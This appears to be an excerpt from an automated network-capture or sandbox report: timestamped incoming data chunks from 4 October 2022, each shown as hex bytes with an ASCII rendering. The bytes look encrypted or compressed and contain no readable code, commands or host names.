                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22248INData Raw: ef 97 6d e8 f8 23 5d 99 40 b1 71 44 c1 a8 1f 8a f1 fc c9 a3 28 5b 0b 88 37 03 8a d4 5f 35 c2 35 8c 71 59 42 c6 f8 92 ee 6e 87 b5 21 39 41 2e 9a 85 76 28 dd 9d 08 c6 8a e4 7d e6 d6 d8 47 cc c8 b8 a1 96 49 d9 55 9f 29 f9 f0 78 a9 5c f2 78 cc 36 8e fa 4c 09 10 53 49 8e 4b 9f ac ed d1 39 ea cd 60 03 1a b4 d8 c8 d4 81 d4 da d3 0c 99 83 c4 19 08 8b a9 d5 cc a7 93 d3 e2 f2 8a 77 f1 87 7e 15 df 5b 87 6b de 26 6c 34 b3 e0 34 a3 a7 56 7a f6 10 80 e0 a4 7d 3b e4 eb 90 8d 79 9f af 2b 7f ad ed fa 00 1c 6a dc 08 f4 62 68 c7 11 5c d1 0e 18 9c 9b 85 74 11 78 c7 82 8c 2f e2 f3 47 08 6f 15 7d 23 d5 09 28 12 d6 7b fd e8 b4 d7 a4 3d 5d a1 9e 3e cd 79 80 db bd cf 76 14 bf 67 7c 01 e7 03 6f 8b b8 17 e4 bd ae 00 04 7d 44 53 1a 85 79 43 dc d7 3f 14 7d ee 13 74 b5 b8 56 3c 47 b5
                                                                                                                                                                                                                                    Data Ascii: m#]@qD([7_55qYBn!9A.v(}GIU)x\x6LSIK9`w~[k&l44Vz};y+jbh\tx/Go}#({=]>yvg|o}DSyC?}tV<G
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22264INData Raw: ea b8 93 97 ce 23 cf 3a 1e 47 b6 6f a4 a6 55 b6 23 34 93 80 0e a7 25 f3 ed 8d 4c 17 33 4e 58 72 53 5f 96 9d d1 e2 f3 47 e5 fe a1 f7 8a 21 7b 09 35 64 35 f3 e5 0e 36 0a a4 7e 30 4f 2b a5 70 e6 ee 91 74 fb c5 8e b8 5f 81 de a1 c0 81 9d 91 66 a5 8a c0 0d 51 2c d5 ae 54 1e 8d 6f 9c 04 de 67 45 36 e7 7e 68 fa 3f f2 86 e6 01 48 41 1f 38 0c 4f ce 30 47 05 5a 66 9b a3 a2 de 92 cc 14 06 1c cb 25 cb c5 f6 92 d4 95 50 a8 53 fe 31 16 fa 59 02 e8 7b 2c b4 ef 28 b2 71 c3 7a 13 db 69 8e 11 f0 69 86 85 cc 17 48 8c 87 ff 84 e3 7e 85 7d bf ba 5b e6 08 fa 55 9d 43 d2 1f 9d 02 50 0d 8c fb 47 d1 0a cf 9c da 5d 48 db 0b 9a dc b8 94 b9 18 f5 59 2c 73 59 b5 07 8f d9 ac e0 e5 ce e6 fc 5f 2a 27 c5 ab bd 63 39 ab 66 5b 28 13 33 1b dc d4 4f ba a9 58 7c a9 66 37 04 6d 6a 2b c6 62 66
                                                                                                                                                                                                                                    Data Ascii: #:GoU#4%L3NXrS_G!{5d56~0O+pt_fQ,TogE6~h?HA8O0GZf%PS1Y{,(qziiH~}[UCPG]HY,sY_*'c9f[(3OX|f7mj+bf
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22280INData Raw: ab 1e 5e 0a 2c 4d ce 86 7d 4a c2 ae 17 b2 63 e7 86 f1 c1 65 9d 02 0f 0b bb fc 5c 9c 11 34 39 be cf d6 4c 48 d7 23 0b 18 79 35 69 eb 4e d2 d5 da 90 68 db ea ef e8 e8 43 72 1b 96 a4 dd dd 02 31 db bc d6 ba 53 0c dd 78 40 dd e5 df 4d 15 89 a2 49 a1 57 bf 95 6c a5 5d 68 02 f2 d2 86 e4 71 20 d8 b8 5f b7 c6 ee ff df c8 17 23 84 f3 dd 26 78 63 c2 2f 21 d3 f3 2e e1 ae ee 2f 84 11 b5 30 e1 88 f7 8f f7 5a 65 8b 0a c8 a7 5b cb 19 52 1a bb b2 3e 81 0e 5d ad ab f9 f2 da 99 6d ce 68 83 04 27 ba 8e a4 a9 20 54 3d 00 30 31 79 75 54 b5 14 ab fc f7 39 e3 30 af 98 4a 38 91 7b 30 ac 38 23 a2 e0 a3 56 3f 26 02 50 6e c8 56 f7 5f c0 9b f8 ed 54 63 23 9c fc d3 f2 d7 31 81 ef 5d 9e ae c0 ec 9e aa aa 1d ba 5f 2d a3 49 2f 6c cb 13 fb 63 05 cc a9 da 23 e0 b5 20 32 da 7a e0 07 4f b0
                                                                                                                                                                                                                                    Data Ascii: ^,M}Jce\49LH#y5iNhCr1Sx@MIWl]hq _#&xc/!./0Ze[R>]mh' T=01yuT90J8{08#V?&PnV_Tc#1]_-I/lc# 2zO
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22296INData Raw: fb 9f 0b 41 32 a7 a3 c1 ef 5d 4e f6 0b e5 c3 08 91 af 90 bd 43 f8 fd 40 47 74 f2 ae 88 b9 c8 0a 1a 56 e0 f5 6a b1 35 8f 73 93 06 aa a1 ea 7c 86 c2 54 c3 f3 8b 7d 8a 67 5b ff 29 d4 41 f2 90 0f 87 83 ac 76 6f 2b ba 64 1d 58 6a 0a 6a 08 f2 04 7a ca 25 ab c3 67 db c8 df d2 c0 c1 8e c8 e9 0d bf ae c5 42 f0 97 43 b3 55 a0 0c 4f 73 d6 ca 97 5c 59 a5 a5 d0 2d 80 4f 93 c4 81 7f 25 70 42 e8 7f 84 29 b6 10 f1 68 20 53 58 df 1f 51 51 7a 74 1c 01 16 3d ca cb 1a b6 b3 48 03 70 47 15 a6 31 12 1f c0 17 bc 19 e8 14 af ac d5 8b 89 89 12 7e cf 27 c0 d2 17 7f d1 48 74 47 7f 34 9f 3a 6e 50 9a 4f da fb fd 56 24 e0 40 9d 73 1d 7d 16 ca db 6f 5b 83 d7 40 86 4e e0 1d 9d c6 52 1a 4a 2a 7e 9e e5 80 be f2 ec 42 1e 42 9f cc 97 52 dd 33 6c d2 4a 49 84 30 25 54 a2 8b 5f b6 c8 e3 1b 5a
                                                                                                                                                                                                                                    Data Ascii: A2]NC@GtVj5s|T}g[)Avo+dXjjz%gBCUOs\Y-O%pB)h SXQQzt=HpG1~'HtG4:nPOV$@s}o[@NRJ*~BBR3lJI0%T_Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22312INData Raw: d5 38 02 39 fc 16 56 bf 96 bf 2d b5 fa 2f ac 4f af 59 ee 1e 4b 91 8c 53 9e 24 00 8c 85 6e e1 88 30 f7 2e d0 d5 3c a2 62 a7 31 ae 30 62 2d 0b c2 2e dd 60 01 ce d1 c6 11 04 92 e0 32 25 0c 94 56 d8 3e 20 b1 d9 db d1 a9 4e 50 ac 2c d3 91 c2 54 bb 3f b1 d6 a5 c2 74 05 7c 6e 81 db 3e 0d d1 e6 ac 9b d5 fd 03 34 b2 44 20 59 e8 4a 1b 2f 48 ac 81 d7 1b fc 7f d7 1f 7b c6 d9 e4 38 65 39 98 df 4f 9a a9 42 c8 68 1d e3 dd d5 5b b1 7d fd 99 3c 1d 13 dd 0c 3f 00 60 79 93 c3 2c 52 bb b3 24 e4 e4 b3 20 7d 0f 62 5f a0 aa 0e 07 e0 07 14 77 d4 aa 8d 46 08 61 4b 9e b1 0b e3 8c cb 0a cc b3 4e 34 a6 13 50 60 bb fa 1e 26 a9 47 6c 4f 85 37 60 a8 d4 22 7e 45 44 ab a5 67 e1 9f 93 3f 9a b2 17 b1 a5 d6 11 55 5d 14 38 35 e6 ce c1 76 a3 44 d5 ca e3 71 b6 f1 03 72 25 88 42 31 28 aa 4c 19
                                                                                                                                                                                                                                    Data Ascii: 89V-/OYKS$n0.<b10b-.`2%V> NP,T?t|n>4D YJ/H{8e9OBh[}<?`y,R$ }b_wFaKN4P`&GlO7`"~EDg?U]85vDqr%B1(L
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22328INData Raw: f8 35 c4 dc f6 bf 1c fa be 53 a5 8a 45 d0 94 3d 7d 12 05 8a 21 ea 69 1b 16 d1 78 f0 5c 81 65 c7 0a d2 c9 a9 da 78 22 e9 b2 42 c7 c3 ca c7 3c e9 7a 93 e1 90 60 a0 48 86 12 04 89 a0 4e fb c1 ed d0 4a 4c a9 50 87 85 bd 2a 49 fc ab 73 b4 25 db ad e5 99 63 c7 a6 e9 7a 5e db 40 b2 48 b9 2d 88 67 d2 a2 a9 92 28 f0 85 44 2b b7 56 b5 c6 85 be a5 dc 65 9e 2f 21 6d ca 10 20 42 c7 56 d6 bc 71 b4 cd fc 14 d2 71 b3 7b 29 0d 58 13 98 59 1b 5b 25 3a 1d 01 ad 54 d0 50 c9 f8 86 e3 a9 f5 2f e8 ca ab 01 c5 ff 05 2f 2f ff 83 df f1 d0 ba 84 9c 08 8d c6 61 fa 52 2a 7c cc 5b 2b 47 89 a5 14 13 66 b6 cf 8c 41 dd 12 df 12 1e 9a 62 18 4c 0e eb b0 bd 2f 90 0e 78 a2 60 e3 8f ca 6a 29 9c 79 3a 26 6f 40 71 fb 3b fd 66 f3 a5 ca c2 cb c3 ab d4 f2 2f 21 d9 3e 79 04 3d 60 ea 6d e1 0d 92 a2
                                                                                                                                                                                                                                    Data Ascii: 5SE=}!ix\ex"B<z`HNJLP*Is%cz^@H-g(D+Ve/!m BVqq{)XY[%:TP///aR*|[+GfAbL/x`j)y:&o@q;f/!>y=`m
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22344INData Raw: 62 cc ee 13 a7 8e ae a6 f7 50 12 1f 5f c0 54 12 c5 23 cd bd e1 c3 47 b9 14 3d d2 71 28 62 ae 17 e4 ae 4c a0 cf 6d 21 03 a1 55 05 d8 ab 3e fb 6c 22 dc 94 15 e8 91 53 a6 91 51 ee 4b 80 53 2f c4 7f a9 2c a7 78 d9 34 51 91 e8 1c 21 84 68 b1 38 60 46 ac 5f c8 45 81 36 f3 24 60 3a df 70 43 dc 68 cd a1 94 78 a8 be 75 d4 4f 46 8d 7a 99 69 75 89 78 38 b4 10 ef 0b 04 dc 12 2a 6c 41 53 09 10 16 ae 6f 44 1c 39 6a 2a 3d a6 36 cf 79 55 8d db 8c 66 e7 72 ee 4b a0 cf 81 a5 dd 4c 11 33 36 78 6f fb 88 66 97 79 56 6b d8 08 7c 3f 82 86 db 57 20 67 b6 87 65 35 cc 39 b4 1c 57 d1 51 26 72 e8 c6 5b 73 a3 81 db 31 2f 6b db cb a8 af 0a bc 6a 7a bd a5 20 5d f1 90 84 a0 43 09 df c6 b4 94 a1 d4 5c b4 20 07 a7 b2 74 5b 87 d3 28 e5 91 b1 15 64 68 4c 0f 22 19 3c 48 24 e6 87 29 ba f4 85
                                                                                                                                                                                                                                    Data Ascii: bP_T#G=q(bLm!U>l"SQKS/,x4Q!h8`F_E6$`:pChxuOFziux8*lASoD9j*=6yUfrKL36xofyVk|?W ge59WQ&r[s1/kjz ]C\ t[(dhL"<H$)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22360INData Raw: 4a cd 02 f0 b0 1c b8 48 c3 1b 38 4e 03 a2 d7 ed 3c ba 00 76 c2 ec f9 fb 41 e7 6e 3b 20 89 d3 17 f5 ee 3d e3 42 e6 09 5a 57 f9 3f 53 70 26 72 87 d5 94 06 14 d5 59 37 e1 56 89 b2 57 90 e5 27 91 0c 51 2e 84 2d 65 99 f3 d5 80 14 c9 91 75 fd a7 48 2a a6 0b d3 8d 86 7a 98 f2 cc 1b ff de b1 2c c8 8f bb f4 b9 1e b9 82 5f 3b e8 cd 76 b4 5b 4c 00 03 3f 6f 10 6c 37 ea c4 16 ab 88 7b d2 aa 8a 06 de 7f b7 4d 78 23 dc 87 0f 34 86 da d3 b4 06 b8 d1 9a e8 9c 90 1d 5a f0 58 d9 f5 cd 11 55 a0 60 37 38 fa ae 35 2b 45 f7 74 7e 68 27 ee d2 4f c1 f3 79 4a 48 36 2a b9 82 3f 19 83 c3 42 c9 52 97 89 de 8c 12 2c e9 96 77 15 ea a2 84 e8 04 6f da ba b6 03 ff 26 81 ed fe d2 d8 98 21 5b 21 fa 10 5b 9e 0c 28 73 c7 77 5f 1b e4 96 02 0a f9 b5 66 1c 74 c0 1d ae 1f 62 7b 5b 70 7b 96 02 1f
                                                                                                                                                                                                                                    Data Ascii: JH8N<vAn; =BZW?Sp&rY7VW'Q.-euH*z,_;v[L?ol7{Mx#4ZXU`785+Et~h'OyJH6*?BR,wo&![![(sw_ftb{[p{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22376INData Raw: c3 33 a7 92 5a 3a c0 53 59 e8 60 08 27 2c 3e 4e fd f7 af 5b 70 41 22 5c ef b1 33 ab 08 14 3f 81 b5 d0 5f 09 70 82 c8 96 62 53 28 b9 5c 9a 31 c6 f7 b9 f0 9e c8 e7 95 23 2f b3 9b b6 0d 11 d3 ce be 67 48 d8 bf 63 8f ac eb 90 71 45 a1 a5 4f 2b 23 40 24 1f 86 34 59 47 96 1e 4e 8e 32 34 af 63 cd 50 54 92 8c 7b 14 2b 49 3a 46 4e ec 36 e4 07 4c a1 ce 2f 18 cb 68 a2 ff 93 97 9b 8a 5a 36 45 eb cf 9b be 84 5a 80 53 e2 36 1b dc 06 fc f6 51 f2 33 75 fd 56 36 e5 3f d2 29 86 13 e8 04 33 f6 7d 42 4f 30 55 48 f4 2d b9 f7 9d 6a 3f f8 29 ac e1 38 f1 3c b8 60 a2 98 1f e2 e3 8a b9 d3 fb 71 8b 4c 24 a6 ba b1 00 c0 55 01 5b 41 3b a4 20 81 af 4b c4 51 6f 1a ee e0 61 5a 63 a9 01 4a 89 eb 7e 93 c3 02 61 a3 22 69 f2 68 94 e5 81 e1 ac dc 2f 0c 25 70 47 78 2a ab 26 79 8d 10 86 f7 b8
                                                                                                                                                                                                                                    Data Ascii: 3Z:SY`',>N[pA"\3?_pbS(\1#/gHcqEO+#@$4YGN24cPT{+I:FN6L/hZ6EZS6Q3uV6?)3}BO0UH-j?)8<`qL$U[A; KQoaZcJ~a"ih/%pGx*&y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22392INData Raw: 89 0a 3f 7b eb c8 14 f4 39 e8 d6 f8 77 48 b3 b2 8f 28 93 81 84 38 c4 22 95 c7 17 2c a9 2f 75 15 40 2c 42 de 81 3d 24 b5 30 05 c8 8c 2d 80 fc 2e 08 39 de fb 0a 62 e6 6a b8 8e 25 7d aa 4b cc d4 e9 44 48 42 a6 a0 3b 99 0c 9a 1b c0 ce b5 c6 92 ad 87 1c 24 06 70 1b 95 cc 64 1d 7d be 84 99 e2 fa 1f 8e d2 f5 59 07 b0 8c 63 8c 27 7d 72 e7 22 e0 b8 ae 54 ad 8f b9 32 44 55 1e 4e 76 f3 9c fd 54 50 86 95 53 1b ca 5e ef 76 49 f6 42 5b 47 77 33 68 df ea 00 fa b7 46 90 21 17 e9 b7 50 53 dd c1 23 00 3c a9 00 4f d0 84 72 7c 61 f5 b4 3e 77 eb e9 bf a6 2a ea e1 64 ea 14 bd e2 10 18 a9 81 59 3b b4 29 3b e1 34 75 51 9d 31 eb c1 eb a6 c8 6a d5 6c 23 8a b0 c5 f5 25 9d 52 eb 14 c4 c1 88 e4 8b 6b 5e 84 1b 4f 82 e0 17 4e 18 9c 15 98 b6 12 ff 9f 31 23 f4 58 6f e3 13 ce 09 3d 81 34
                                                                                                                                                                                                                                    Data Ascii: ?{9wH(8",/u@,B=$0-.9bj%}KDHB;$pd}Yc'}r"T2DUNvTPS^vIB[Gw3hF!PS#<Or|a>w*dY;);4uQ1jl#%Rk^ON1#Xo=4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22408INData Raw: e3 9e 1b 85 e6 be 99 3b 0d 3b e6 e6 33 ae dc 81 3a f7 6e 9b cf 93 c2 98 1b 07 07 a4 74 ae d5 42 89 b5 5e ce 45 08 15 83 d3 da 4f 49 09 c4 e5 3b 71 15 92 79 50 4a 35 f9 48 a6 6d 1e f6 db 96 c8 89 f5 51 c8 40 eb 39 a7 f2 58 89 40 b8 2c bd a5 53 50 d1 d7 41 ca e0 d7 7d 41 50 c7 08 18 69 61 7c 14 8b 6b 7d c2 a7 85 69 94 9d 88 ab 41 c1 82 ca 18 f4 1b 28 b4 0b 66 59 e1 60 ad fe 9f cd e5 23 da 51 19 c2 a3 63 92 4a 19 9d b6 96 e1 ed 2d 8d 9d 23 79 2f 00 3c 83 54 d6 51 aa da 63 f8 8b 17 4a 51 45 88 3b e8 00 0d ce 0d 60 b3 fc 19 5a 4e 3f a7 18 81 4a f4 ed ab 55 26 c8 0b 77 0b be 66 6b bf d5 f6 7e 8c 4d 0c f3 89 46 ed 02 c7 a4 a3 70 3f ea d1 03 47 96 73 95 0b e9 51 e7 7e 2f f5 ab 3f 59 26 4d 54 0c 54 78 ce 41 9d 5b ee da 37 31 41 4e 4b 60 23 76 27 9c 56 a3 94 35 d1
                                                                                                                                                                                                                                    Data Ascii: ;;3:ntB^EOI;qyPJ5HmQ@9X@,SPA}APia|k}iA(fY`#QcJ-#y/<TQcJQE;`ZN?JU&wfk~MFp?GsQ~/?Y&MTTxA[71ANK`#v'V5
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22424INData Raw: b6 d7 ae 5f 11 ab e8 d5 f9 cf 59 65 d2 c9 71 09 97 43 43 2e ae 9c 7c 11 26 90 28 2c 61 1e 75 f8 aa b9 68 9d cb 41 32 e2 a5 e7 27 f3 67 59 9a 45 6a fe 0d 5a ca 79 9b cd 85 38 44 f1 b6 de b1 49 df f1 5f 09 07 61 68 61 a5 11 c6 e1 17 cf 0e 25 7d 85 e0 27 93 0b be 08 f8 4e ae 4c 73 3f 91 e1 04 f2 5d e2 8d 4e 35 f2 2f 36 45 f6 cb cb b2 35 0f 77 0f 78 b0 e8 5d 0a f3 da 0d 75 4d 31 d4 4d b4 9a 87 ab 80 f7 30 4c 5a ec 14 8e 16 4f b2 e4 34 9f 5f f1 31 60 ce f1 68 78 10 95 72 71 4d 21 00 42 a5 5a 86 0a f2 01 49 29 16 af 7b 86 04 ad d6 13 89 7a 2a c6 03 d4 ca 09 e1 4b 5d e7 05 e2 ea 4c 5d a9 87 ad 5b 5d 6e c0 8f 79 76 9d 63 6d ae 44 af 6e 60 f3 4b 43 af 38 f2 b9 a6 19 70 c6 4d 1a 29 1f 1e 7d 5d 34 50 8f 32 ff 29 c4 83 f7 e1 a5 78 1f 8a 36 1c 65 46 e2 53 18 30 4a 5a
                                                                                                                                                                                                                                    Data Ascii: _YeqCC.|&(,auhA2'gYEjZy8DI_aha%}'NLs?]N5/6E5wx]uM1M0LZO4_1`hxrqM!BZI){z*K]L][]nyvcmDn`KC8pM)}]4P2)x6eFS0JZ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22440INData Raw: ff 9f d7 fe f2 c2 8f 3f 8c e1 44 e2 af d2 c0 72 29 7c b3 1d 7f e5 3b 9e ce 75 59 95 68 bc 73 ba 14 35 77 fb 2c 24 e9 cb a7 dd 65 63 ee fe b9 73 69 f7 87 ce 67 8c d6 97 51 07 78 00 e4 7a 96 cd 5e 34 da fa 95 b2 b9 ab c1 3d 31 9d 14 51 3d 20 6c b3 79 40 e3 eb a9 8f ab 22 db 92 6e 71 38 4d 58 b4 00 c3 cd 69 fe 28 8c 22 bb ad fd e4 39 64 23 9f dd 06 0e 00 90 71 ec 5c eb dc 47 11 9b a3 76 33 03 fe 78 ef 13 fd 8a e7 a9 11 b9 4d af fe 9b 27 3e d3 59 80 02 10 80 d6 6e fb 7e 4a 35 8e e2 f2 23 2c e2 9c 5c 17 5a 7e 50 e0 33 fc 13 04 61 10 c5 3b b1 c6 19 08 66 fd 68 70 80 2d 62 02 74 ca 2c 8a 3c 2b af 53 6c a4 b0 94 87 5d f7 0e 37 01 8e 5a 2c cf 0b 08 07 9f 2d 1e db 52 db 17 aa 91 59 55 0a e4 aa 7a 61 2c 4d e4 84 5a 4b 72 a2 5b 5b d0 ee ff 80 55 8f c6 cc db 64 c2 7a
                                                                                                                                                                                                                                    Data Ascii: ?Dr)|;uYhs5w,$ecsigQxz^4=1Q= ly@"nq8MXi("9d#q\Gv3xM'>Yn~J5#,\Z~P3a;fhp-bt,<+Sl]7Z,-RYUza,MZKr[[Udz
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22456INData Raw: 77 f9 d8 90 da 4e d9 10 f4 59 49 73 39 ae 12 14 bd 9b 37 47 0d 86 94 5e 4b 3a fd 6f 0f bc 23 da dd bc ea 41 83 fb 6a 0e e1 36 03 5f 8d 81 0d 93 15 6b 58 7a 7a b0 6e ce 55 b1 da e5 36 c7 e1 87 f9 41 f0 24 93 58 ff e1 3d 30 5a 93 51 bf 14 83 55 5c f1 ca ca fe 1a 1b 77 ab e2 0c 24 75 cd fe 97 55 52 b8 ba 1f bd da c8 92 40 1d d7 6b 22 37 86 98 7d d6 05 cc 26 61 ca 96 35 4c 19 28 88 13 4d 00 f2 7e f6 ef e4 4b 98 76 6e e1 e2 04 55 c2 c5 71 fa cf 17 7c c6 2b cf ad b2 24 9a d4 ea 23 e1 1c df 70 45 0b 4d 4c 92 52 31 51 7f b4 5f db b1 42 40 b1 e7 43 7a cd e0 59 3c c9 0a c4 2f 03 16 53 8b 60 ad d5 bf 31 9c d0 3b ae 9d a5 8b 99 cc 46 c0 a0 15 eb b1 ce 02 29 33 4a c3 15 34 7e 0b 79 04 25 89 9a 75 6d 97 20 03 e4 50 56 d7 80 86 ba ba e6 e8 24 67 fe c9 20 1b bb e0 16 ec
                                                                                                                                                                                                                                    Data Ascii: wNYIs97G^K:o#Aj6_kXzznU6A$X=0ZQU\w$uUR@k"7}&a5L(M~KvnUq|+$#pEMLR1Q_B@CzY</S`1;F)3J4~y%um PV$g
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22472INData Raw: 5e 1e b7 8e c8 a9 80 fc 15 1e b4 9e bd ec 7c 94 b5 17 fa 6b 3f ee 5d 56 6d d3 ed 96 7c 60 08 9f 71 3e a4 30 16 5f a1 2b 77 ce c8 80 60 00 4f b6 c8 5f 2c df 72 e0 2e d7 29 3d 27 a5 ec 5e 3d bf 32 c5 6f e0 62 6a a9 8c 02 48 ce 5e 4c 07 18 ab b7 48 08 3c 42 20 ed b0 21 24 15 e0 43 a9 66 57 34 a2 c3 f0 0c 8a b3 b2 32 63 aa bd 9c f3 38 12 43 e3 a2 85 0b ee d6 4d 1a 78 0c 07 30 bc 73 06 9f de 27 f5 32 54 50 a8 a8 dd 66 f6 04 94 a2 51 b4 ce 2f b7 ee 91 4f 2f fd 02 8f d7 de 07 75 9b 8e f3 d9 63 1b ca 7d 77 b4 27 52 8d b6 35 82 0a 9f ff 14 30 58 d1 61 01 ce 73 de 7f 2c 65 9a ea 76 d4 eb c0 5c 75 35 e5 9a 85 8c 48 be 17 91 75 9b dd 4b 98 5a 37 70 59 84 47 b9 8c 14 0d 2f 42 58 fd 05 5e 9e 9f 5a 49 6d 9d 5e 6a 1f 66 4e be 26 cf 4b 3b 7f 1a d8 e4 57 7b ba 20 ca 60 e2
                                                                                                                                                                                                                                    Data Ascii: ^|k?]Vm|`q>0_+w`O_,r.)='^=2objH^LH<B !$CfW42c8CMx0s'2TPfQ/O/uc}w'R50Xas,ev\u5HuKZ7pYG/BX^ZIm^jfN&K;W{ `
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22488INData Raw: 4a 40 7f 81 2a c1 b6 dc 2e dd 2d 15 b3 8a f4 a7 e5 2b 0a c4 ff b6 43 af f1 21 8a 34 7d 7a ba d5 f2 36 c5 3c 0f 34 6e ca 7b 7a a6 64 04 7a 29 52 6f 48 3e c7 68 75 f3 2e 9a 56 67 e2 d9 57 22 a0 a2 bd 87 61 41 97 6e 2c f5 2e a6 c1 2f 59 63 9d f9 0c ca a2 e1 66 ef d1 af 48 c7 03 c6 1e 6e 3a fd ba 13 a9 30 f5 65 b6 33 ff 6c ad 20 c3 1b 2b b1 7a 90 a7 73 6f 72 3e 9e 64 1a cd 99 69 96 c2 1b a8 6f 9d fe 9d d2 2c 88 d0 10 00 e2 78 3c 40 f6 40 ca a4 e1 ab 6a fb bc 08 ef a5 5c 48 6c 69 b3 dd 23 99 27 eb 71 bb 90 4c 22 ed 8d 3b a3 53 2f b1 b2 dc 9e cd 38 8c 49 0c 6d b5 80 1f 4f e9 3a 86 27 f3 64 af 17 91 4e 80 b5 85 6c 90 05 48 14 aa 59 96 ef c5 45 4e ab 61 10 e7 90 7f 40 aa 78 4d 6f 96 44 0a be 24 9b e6 c7 28 ba 92 b8 7a fb ff dc 85 96 5f f8 22 6e c2 f8 7f 75 b1 9f
                                                                                                                                                                                                                                    Data Ascii: J@*.-+C!4}z6<4n{zdz)RoH>hu.VgW"aAn,./YcfHn:0e3l +zsor>dio,x<@@j\Hli#'qL";S/8ImO:'dNlHYENa@xMoD$(z_"nu
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22504INData Raw: 1c 6a ad ac 22 61 b5 37 44 2a c4 bd 26 18 7e 65 fe a0 c8 bb 0d bb c4 52 22 5a be ed 7d ea 3e a1 d8 67 45 0f e5 e4 a7 cd 53 fb 8e e0 55 fc b7 6e a6 9c 5f 17 9f 5f 7b 3d 3a b5 78 77 c2 34 e1 fe 17 4b 89 5d 98 7e 3a fe 29 59 0b a6 c6 69 3b 8a a4 90 fc c1 c1 0a 18 e5 f0 af 6b 97 e3 21 f4 e0 f2 e9 a2 cc 6b e3 4b bd 7e ec 67 b8 58 2a 69 a0 88 ca 24 c5 4e 9e 9e 60 c4 30 a8 1a e8 68 48 15 63 73 12 64 b3 45 36 12 fc 7a d9 55 d2 b9 e1 c0 e8 52 e9 4d 08 ba ca 73 5c a8 c8 dd 07 7e 72 cd 68 69 04 03 b2 b0 18 9a 9f 20 42 e4 97 c4 d2 ff 4f f9 69 0c 9c fa 94 a4 51 8e f4 1e 53 a5 0c c5 cc ac 0f 1e 14 4d 1a 9f f0 d6 31 e9 66 c1 3a 3b 2d 6a 77 98 bb 5d 2a 05 48 23 5d b9 b6 a6 c1 d8 4c ec b2 11 c9 cc 9d 1d 1f 39 f7 60 5c bf 02 84 a8 e7 95 78 ea 22 17 2d 11 3f 17 b1 77 37 9c
                                                                                                                                                                                                                                    Data Ascii: j"a7D*&~eR"Z}>gESUn__{=:xw4K]~:)Yi;k!kK~gX*i$N`0hHcsdE6zURMs\~rhi BOiQSM1f:;-jw]*H#]L9`\x"-?w7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22520INData Raw: e9 5e ba 49 2c 30 d8 94 63 29 39 f0 a1 da a1 df 65 0a db c5 55 c7 16 41 a3 68 65 41 b6 48 9b 17 13 d3 79 70 19 8b 2a f4 a3 ac 91 de fa 0f 5b 6b 4c cc 35 37 df 30 6f a4 f8 e3 ef be de cd 2b 93 0b 9b 7f 04 ef 0f 3d 85 a8 f4 e3 0d 5d 42 26 f1 0e 05 b0 b4 df b1 d3 ce 4d fc 14 4e 45 74 49 3e 81 dd a3 67 6c 39 16 02 c7 3b e0 96 d0 23 62 59 41 6f dd b0 1f fc a7 88 88 f6 e2 10 ef a8 18 6c 2a f8 33 77 2b 7d ff b6 d6 89 20 9c a4 8a 2e 8d 73 52 ba e6 90 23 d1 96 f0 8c 78 ca 35 fa 13 3d 64 1d 3c db c7 63 07 08 6f 85 ae de ae fa 62 5e f7 b2 e2 4d 31 c7 5e 81 8f 21 a8 e2 a7 95 f7 71 2f a0 bd 38 3b b8 3f 7b 2b 57 9a 99 a6 a2 e6 13 65 4b 40 51 af 61 2f eb 6b a9 46 9d f7 34 c3 21 3a 56 9d bb 62 56 20 e4 14 6b d3 a6 c8 2b ce 51 91 36 23 ae 5e 06 4d 69 91 71 c6 fa 6f d5 96
                                                                                                                                                                                                                                    Data Ascii: ^I,0c)9eUAheAHyp*[kL570o+=]B&MNEtI>gl9;#bYAol*3w+} .sR#x5=d<cob^M1^!q/8;?{+WeK@Qa/kF4!:VbV k+Q6#^Miqo
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22536INData Raw: ba 1d 9a 3b 0a 1f 68 94 33 8c c8 ce 83 3e a6 ce f7 91 77 70 3e a2 e4 c8 de b6 e7 ce 46 14 83 22 25 f9 73 c9 eb de 5f d7 88 e0 70 ae 68 f7 22 bf 41 f8 51 ef 8c 39 d3 9d e5 83 cb 93 2f 1a 55 a5 fc 10 bb 99 ab 62 87 6c 49 41 e6 5e 42 15 d7 6b bd c5 b7 89 4a bb cc a8 df 56 be f1 98 0b 2e fd bd 66 a6 32 1c 13 c5 e8 51 56 0c b4 cb 3b 55 be df f4 59 17 8f 22 48 02 b6 4c 88 ea b2 5c 6f d4 d8 77 e1 c1 e6 e0 e9 e9 6e 9c fa 25 18 98 42 9a 46 ab 6a b9 ce aa 4c 7d 89 b7 a9 cc b6 ad 69 c2 c8 87 9d ec b3 91 92 74 fb ef cb 46 51 dc 99 d0 c9 dd 4d 14 f8 5e 27 a8 47 15 dd 67 2a c1 4f 3a 86 f3 f0 bb e8 a5 a5 81 d3 d2 84 f4 47 b1 4e 07 fd 8c 0a 78 85 1e 54 75 e0 4b df 27 d2 54 69 6d b3 71 cb d2 4f c5 98 26 15 75 31 a8 68 e6 ca d7 27 a3 af ef 10 5e c7 4e 58 e2 1d 95 d2 7d ee
                                                                                                                                                                                                                                    Data Ascii: ;h3>wp>F"%s_ph"AQ9/UblIA^BkJV.f2QV;UY"HL\own%BFjL}itFQM^'Gg*O:GNxTuK'TimqO&u1h'^NX}
